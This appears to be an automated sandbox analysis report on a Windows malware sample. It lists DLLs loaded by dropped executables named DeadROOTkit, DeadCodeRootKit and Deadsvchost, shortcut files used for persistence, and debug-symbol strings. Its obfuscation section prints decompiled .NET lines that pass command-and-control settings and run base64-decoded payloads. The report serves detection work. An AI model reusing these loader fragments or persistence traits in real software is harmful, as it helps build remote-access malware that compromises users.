                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: pdh.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: scrrun.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: linkinfo.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: ntshrui.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: cscapi.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: avicap32.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: msvfw32.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeSection loaded: taskschd.dllJump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeSection loaded: taskschd.dllJump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeSection loaded: taskschd.dllJump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeSection loaded: xmllite.dllJump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeSection loaded: taskschd.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\dllhost.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\System32\dllhost.exeSection loaded: pdh.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\winlogon.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\lsass.exeSection loaded: pdh.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: mscoree.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: apphelp.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: version.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: uxtheme.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: sspicli.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: cryptsp.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: rsaenh.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: mscoree.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: version.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: uxtheme.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: sspicli.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: cryptsp.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: rsaenh.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: mscoree.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: version.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: uxtheme.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: sspicli.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: cryptsp.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: rsaenh.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\spoolsv.exeSection loaded: pdh.dll
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                          Source: Deadsvchost.lnk.1.drLNK file: ..\..\..\..\..\..\..\..\Public\Deadsvchost.exe
                          Source: DeadROOTkit.lnk.2.drLNK file: ..\..\..\..\..\..\Local\DeadROOTkit.exe
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                          Source: mIURiU8n2P.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: mIURiU8n2P.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000017.00000002.2940183395.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1840509505.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000017.00000002.2940183395.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: WINLOA~1.PDB source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000017.00000002.2940183395.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1840509505.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000017.00000002.2940183395.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1840509505.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000017.00000002.2940183395.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1840509505.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp

                          Data Obfuscation

                          barindex
                          .NET source code contains method to dynamically call methods (often used by packers)
                          Source: DeadXClient.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: DeadXClient.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: DeadROOTkit.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: DeadROOTkit.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: DeadROOTkit.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
